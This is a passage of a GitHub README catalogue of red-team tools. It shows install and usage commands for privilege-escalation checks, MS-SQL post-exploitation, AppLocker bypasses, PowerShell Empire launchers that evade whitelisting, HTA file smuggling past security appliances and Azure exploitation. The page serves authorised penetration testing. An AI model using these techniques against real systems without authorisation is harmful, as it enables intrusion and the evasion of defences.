href=\"https://github.com/GhostPack/SharpUp\"\u003eSharpUp\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sharpup\" class=\"anchor\" aria-label=\"Permalink: 🔙SharpUp\" href=\"#sharpup\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA nice tool for checking a victims endpoint for vulnerabilites relating to high integrity processes, groups, hijackable paths, etc.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Download)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can install the unofficial pre-compiled SharpUp binary \u003ca href=\"https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSharpUp is compatible with \u003ca href=\"https://go.microsoft.com/fwlink/?LinkId=532606\u0026amp;clcid=0x409\" rel=\"nofollow\"\u003eVisual Studio 2015 Community Edition\u003c/a\u003e. 
Open the SharpUp \u003ca href=\"https://github.com/GhostPack/SharpUp\"\u003eproject .sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"SharpUp.exe audit\n#-\u0026gt; Runs all vulnerability checks regardless of integrity level or group membership.\n\nSharpUp.exe HijackablePaths\n#-\u0026gt; Check only if there are modifiable paths in the user's %PATH% variable.\n\nSharpUp.exe audit HijackablePaths\n#-\u0026gt; Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.\"\u003e\u003cpre\u003eSharpUp.exe audit\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e-\u0026gt; Runs all vulnerability checks regardless of integrity level or group membership.\u003c/span\u003e\n\nSharpUp.exe HijackablePaths\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e-\u0026gt; Check only if there are modifiable paths in the user's %PATH% variable.\u003c/span\u003e\n\nSharpUp.exe audit HijackablePaths\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e-\u0026gt; Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" 
dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/skahwah/SQLRecon\"\u003eSQLRecon\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sqlrecon\" class=\"anchor\" aria-label=\"Permalink: 🔙SQLRecon\" href=\"#sqlrecon\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMS-SQL (Microsoft SQL Server) is a relational database management system developed and marketed by Microsoft.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis C# MS-SQL toolkit is designed for offensive reconnaissance and post-exploitation. 
For detailed usage information on each technique, refer to the \u003ca href=\"https://github.com/skahwah/SQLRecon/wiki\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Binary)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can download the latest binary release from \u003ca href=\"https://github.com/skahwah/SQLRecon/releases\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Authenticating using Windows credentials\nSQLRecon.exe -a Windows -s SQL01 -d master -m whoami\n\n# Authenticating using Local credentials\nSQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami\n\n# Authenticating using Azure AD credentials\nSQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami\n\n# Run whoami\nSQLRecon.exe -a Windows -s SQL01 -d master -m whoami\n\n# View databases\nSQLRecon.exe -a Windows -s SQL01 -d master -m databases\n\n# View tables\nSQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Authenticating using Windows credentials\u003c/span\u003e\nSQLRecon.exe -a Windows -s SQL01 -d master -m whoami\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Authenticating using Local credentials\u003c/span\u003e\nSQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Authenticating using Azure AD credentials\u003c/span\u003e\nSQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan 
class=\"pl-c\"\u003e#\u003c/span\u003e Run whoami\u003c/span\u003e\nSQLRecon.exe -a Windows -s SQL01 -d master -m whoami\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e View databases\u003c/span\u003e\nSQLRecon.exe -a Windows -s SQL01 -d master -m databases\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e View tables\u003c/span\u003e\nSQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found on the \u003ca href=\"https://github.com/skahwah/SQLRecon/wiki\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTool module usage information can be found \u003ca href=\"https://github.com/skahwah/SQLRecon#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from SQLRecon help page\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList\"\u003eUltimateAppLockerByPassList\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-ultimateapplockerbypasslist\" class=\"anchor\" aria-label=\"Permalink: 🔙UltimateAppLockerByPassList\" href=\"#ultimateapplockerbypasslist\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 
1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis resrouce is a collection of the most common and known techniques to bypass AppLocker.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSince AppLocker can be configured in different ways \u003ca href=\"https://github.com/api0cradle\"\u003e@api0cradle\u003c/a\u003e maintains a verified list of bypasses (that works against the default AppLocker rules) and a list with possible bypass technique (depending on configuration) or claimed to be a bypass by someone.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThey also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIndexed Lists\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md\"\u003eGeneric-AppLockerbypasses.md\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md\"\u003eVerifiedAppLockerBypasses.md\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/UnverifiedAppLockerBypasses.md\"\u003eUnverifiedAppLockerBypasses.md\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 
href=\"https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md\"\u003eDLL-Execution.md\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList\"\u003ehttps://github.com/api0cradle/UltimateAppLockerByPassList\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Cn33liz/StarFighters\"\u003eStarFighters\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-starfighters\" class=\"anchor\" aria-label=\"Permalink: 🔙StarFighters\" href=\"#starfighters\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA JavaScript and VBScript 
Based Empire Launcher, which runs within their own embedded PowerShell Host.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBoth Launchers run within their own embedded PowerShell Host, so we don't need PowerShell.exe.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis might be usefull when a company is blocking PowerShell.exe and/or is using a Application Whitelisting solution, but does not block running JS/VBS files.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eSetup a new Listener within PowerShell Empire\u003c/li\u003e\n\u003cli\u003eUse the Launcher command to Generate a PowerShell launcher for this listener\u003c/li\u003e\n\u003cli\u003eCopy and Replace the Base64 encoded Launcher Payload within the StarFighter JavaScript or VBScript file\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003eFor the JavaScript version use the following Variable:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-js notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\" var EncodedPayload = \u0026quot;\u0026lt;Paste Encoded Launcher Payload Here\u0026gt;\u0026quot;\"\u003e\u003cpre\u003e \u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eEncodedPayload\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\"\u0026lt;Paste Encoded Launcher Payload Here\u0026gt;\"\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor the VBScript version use the following Variable:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-vbnet notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\" Dim EncodedPayload: EncodedPayload = \u0026quot;\u0026lt;Paste Encoded Launcher Payload Here\u0026gt;\u0026quot;\"\u003e\u003cpre\u003e \u003cspan class=\"pl-k\"\u003eDim\u003c/span\u003e \u003cspan 
class=\"pl-smi\"\u003eEncodedPayload:\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003eEncodedPayload\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\"\u0026lt;Paste Encoded Launcher Payload Here\u0026gt;\"\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eThen run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html\" rel=\"nofollow\"\u003ehttps://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/nccgroup/demiguise\"\u003edemiguise\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-demiguise\" class=\"anchor\" aria-label=\"Permalink: 🔙demiguise\" href=\"#demiguise\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 
1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThe aim of this project is to generate .html files that contain an encrypted HTA file.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis is an evasion technique to get round content / file-type inspection implemented by some security-appliances.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFurther technical information \u003ca href=\"https://github.com/nccgroup/demiguise#how-does-it-do-it\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/nccgroup/demiguise\ncd demiguise\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/nccgroup/demiguise\ncd demiguise\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Generate an encrypted .hta file that executes notepad.exe\npython demiguise.py -k hello -c \u0026quot;notepad.exe\u0026quot; -p Outlook.Application -o test.hta\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate an encrypted .hta file that 
executes notepad.exe\u003c/span\u003e\npython demiguise.py -k hello -c \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003enotepad.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -p Outlook.Application -o test.hta\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/nccgroup/demiguise\"\u003ehttps://github.com/nccgroup/demiguise\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch2 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/hausec/PowerZure\"\u003ePowerZure\u003c/a\u003e\u003c/h2\u003e\u003ca id=\"user-content-powerzure\" class=\"anchor\" aria-label=\"Permalink: 🔙PowerZure\" href=\"#powerzure\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is zero reason to ever run PowerZure on a victim’s machine. Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure, meaning you can safely use PowerZure to interact with a victim’s cloud instance from your operating machine.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Install-Module -Name Az\ngit clone https://github.com/hausec/PowerZure\ncd PowerZure\nipmo C:\\path\\to\\PowerZure.psd1\"\u003e\u003cpre\u003eInstall-Module -Name Az\ngit clone https://github.com/hausec/PowerZure\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e PowerZure\nipmo C:\u003cspan class=\"pl-cce\"\u003e\\p\u003c/span\u003eath\u003cspan class=\"pl-cce\"\u003e\\t\u003c/span\u003eo\u003cspan class=\"pl-cce\"\u003e\\P\u003c/span\u003eowerZure.psd1\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Get a list of AzureAD and Azure objects you have access to\nGet-AzureTarget\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get a list of AzureAD and Azure objects you have access 
to\u003c/span\u003e\nGet-AzureTarget\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a\" rel=\"nofollow\"\u003eBlog - Attacking Azure, Azure AD, and Introducing PowerZure\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://hakin9.org\" rel=\"nofollow\"\u003ehttps://hakin9.org\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003ePersistence\u003c/h1\u003e\u003ca id=\"user-content-persistence\" class=\"anchor\" aria-label=\"Permalink: Persistence\" href=\"#persistence\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" 
class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/fortra/impacket\"\u003eImpacket\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-impacket\" class=\"anchor\" aria-label=\"Permalink: 🔙Impacket\" href=\"#impacket\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp 